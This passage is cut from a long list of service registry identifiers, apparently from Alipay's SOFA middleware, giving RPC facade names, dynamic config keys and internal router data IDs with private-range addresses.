.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmepconnector.facade.service.msc.EpInteractServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gogoal.GgDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.appops.AppDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.permission.AirmngRolePermissionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.PaymentContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.core.service.message.IotMqttMessageSender:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.apppackage.PackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.taobao.chongzhimobile.client.FlowItemService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.meta,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antbrain.facade.message.api.DingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.bizroute.BusinessPropertyInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_MOBILE_USER_WIDGET_MSG_EXPIRY_MWALLETMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insqa.facade.discount.DiscountDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.meta,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditamount.service.PcreditAmountDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcic.service.facade.quota.CalcQuotaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.domainA0#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.erecon.biz.daemon.cache.manager.LocalCacheManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.opnecore.OpenIdAdaptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.OssFileTemplateCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.chatresource.drm.ChatResourceDRM.chatTabImport,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.129.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:promofrontcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.2.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketenoa_ProcessCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.databus.common.manage.facade.DtoRuntimeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openmq.biz.client.MessageProducerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:acctransquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloandecision.common.service.facade.credit.api.AdmitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.41.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.242.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.api.ThingShadowApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:publichome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.amount.RepairFreezeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.darwin:name=com.alipay.darwin.sdk.config.afs.bucket,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.supergw.service.facade.transaction.ITransReceiverService:1.0:isupergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cstrategycenter.common.service.facade.MissionGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mmtcaftscmdproc.common.service.facade.paybox.SmartPayBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileapp.common.service.facade.register.NewUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.qrcode.PublicQRCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.audit.core.service.drm.KVTemplateActionAndStyleDrm.actionConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icif.service.facade.apiv2.AuthorityMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.monitor.MonitorDataQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.stat.RestStatisticService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antemc.service.facade.EmcDiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.biz.relation.DataCleanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zscale.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","alisofa.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:createOrderAuditProcessHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.242.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.common.service.facade.api.I18nFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExStandardProductSourceMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.PrecollectOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcustprod.common.service.facade.api.MemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.discountAgent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.228.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.ebpp.EbppOweInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fincompose@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.es.CensorEsRuleDimService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.extension.service.facade.api.TemplateDefinitionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:codetypeActivationCheckAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FundAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.NoiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:devlopertoolsff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.insrenewprod.InsRenewProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.193.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmarket.mission.PcreditMarketMissionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasbi.common.service.facade.api.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.MessageDirectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.ActivityCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.oto.api.OtotransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.SecuInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.sanction.facade.SanctionFuseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.ThreadPoolConfig.concurrentTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.api.PayRevokeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.teaching.api.TargetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.218.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.onestopmng.OstsProjectUpdateCallBankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.ruleMaxFileSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:fpLmProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antcloud.productcenter.common.service.facade.ArOperationSofaRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.plugin.appfuse.facade.service.UnitradeprodAppfuseFacade:1.0:unitradeprodutc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.selfCureRecover,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imaspmng.common.service.facade.PlayTemplateNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.OpenProfileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.RuleConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cinspfront.common.service.facade.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitradeprod.common.facade.service.OrderRefundQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.tradeapcore.tradeapcore_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbiotcenter.common.service.facade.operation.RobotArmOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbgrouppurchaseprod.common.service.facade.activity.GroupPlatformActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.biz.service.impl.test.WirelessIndexManagerTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-instdatalink-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.signChannelStatusJudgeEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.certifymng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gffund.common.service.facade.api.gfpayment.ExchangeRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.UniformEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finatp.common.service.facade.tool.LogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:applyOrderExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.download.api.ErcInstFileQueryDownLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.facade.service.SandboxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_RESTART_V2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.MetaService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.materialcenter.common.service.facade.api.audit.AuditTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.PromoteCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.service.facade.RecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.maxBurstSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recmng.common.service.facade.api.FeatureDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:appxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ACCORDER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.20.190.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.workflow.WorkflowCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finzyprod.facade.repay.api.RepayApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.181.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.hbBillDescTemplate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxposition.service.facade.schedulerRule.FxSchedulerRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.orchestration.handler.RemoteActionHandler:1.0:sitebuilder-jzappdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyQueryFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.audit.MiniAppAuditWhiteListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.ShopCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.secretary.WorkAssistantProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.escrowexprod.common.service.facade.EscrowExtServiceFacade:1.0:dwuniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.yangguang.YangguangImageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebTrialRemindService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.NotSoldOutGoalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mwalletmng_contentfusionConfigDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.activity.service.SceneStatisticsInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PAYCORERECEIPT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcsmartdecision.service.JiebeiSmartDeductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_promomng_JobRecover#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.biz.iam.service.IamService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITAUTHPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.blog.BlogFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csplatform.service.facade.api.VoiceprintService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@secretcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.opscloudcore.common.service.client.OpsChngTraceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.CardBinCheckServiceFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceValidAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.bizroute.BusinessGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:ZAXHBXCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.109.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.mfinpromo.MfinpromoEquityControlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.apply.LendApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dmirror@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.TradeBaseDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ccr.ApplyFlowQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.cancelaccount.service.CancelZCBAccountCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bis.common.service.facade.face.FaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aladdin.common.service.facade.SearchRecommendResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintranscore.p2p.service.facade.trans.P2pRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.caprod.service.lisa.Ukey2DispatchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PAYRMS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insiop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.MigrationContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityActionBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.apipay.instportal.common.service.facade.PermissionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstoreapp.common.service.content.facade.album.api.ShopAlbumQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.common.manage.api.AccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.MrpcAssistantFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.common.service.facade.api.coverage.FlowCoverageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundAppointmentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.holoxCheckTextQps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.faasset.api.order.FaOrderAssetTransConfirmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.121.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.biz.daemon.event.EventHandler:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.adaptor.ipay.IPayChangeCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.74.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cschannel.common.service.facade.template.service.MessageTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.mds.MdsSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.export.drm.ExportResource.strTextNormalSceneList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbatch.service.BffProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipa